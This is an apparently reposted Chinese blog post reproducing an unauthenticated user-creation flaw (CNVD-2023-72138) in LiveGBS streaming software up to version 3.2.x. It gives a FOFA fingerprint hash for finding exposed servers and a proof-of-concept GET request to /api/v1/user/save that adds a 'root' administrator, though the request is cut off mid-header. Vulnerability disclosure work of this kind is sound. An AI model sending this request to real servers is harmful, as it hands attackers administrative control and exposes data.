博客
关于我
LiveGBS user/save 逻辑缺陷漏洞复现(CNVD-2023-72138)
阅读量:791 次
发布时间:2023-02-06

本文共 585 字,大约阅读时间需要 1 分钟。

LiveGBS是一款由安徽青柿信息科技有限公司开发的国标(GB28181)流媒体服务软件,主要功能包括用户管理、Web可视化页面管理以及开源的前端页面源码提供,同时还支持设备状态管理,可实时监控设备是否正常运行。

在技术细节方面,该软件的user/save接口存在严重的逻辑漏洞。攻击者无需进行身份验证即可利用此漏洞,通过传递特定参数(如ID、Username、Role等),可以执行用户信息的任意添加操作。这种漏洞一旦被利用,会导致后台服务被接管,造成信息泄露等安全风险。

该漏洞主要影响LiveGBS版本号≤3.2.x的产品,已知攻击可能对系统造成严重后果。为了帮助开发团队快速定位问题,我们提供了以下复现环境信息:

FOFA hash: -206100324

至于漏洞的具体复现方法,我们提供了以下PoC示例:

GET /api/v1/user/save?ID=&Username=root&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML,

通过上述方法,可以有效复现漏洞现象。建议开发者及时修复该漏洞,以确保系统安全性。

转载地址:http://tuufk.baihongyu.com/

你可能感兴趣的文章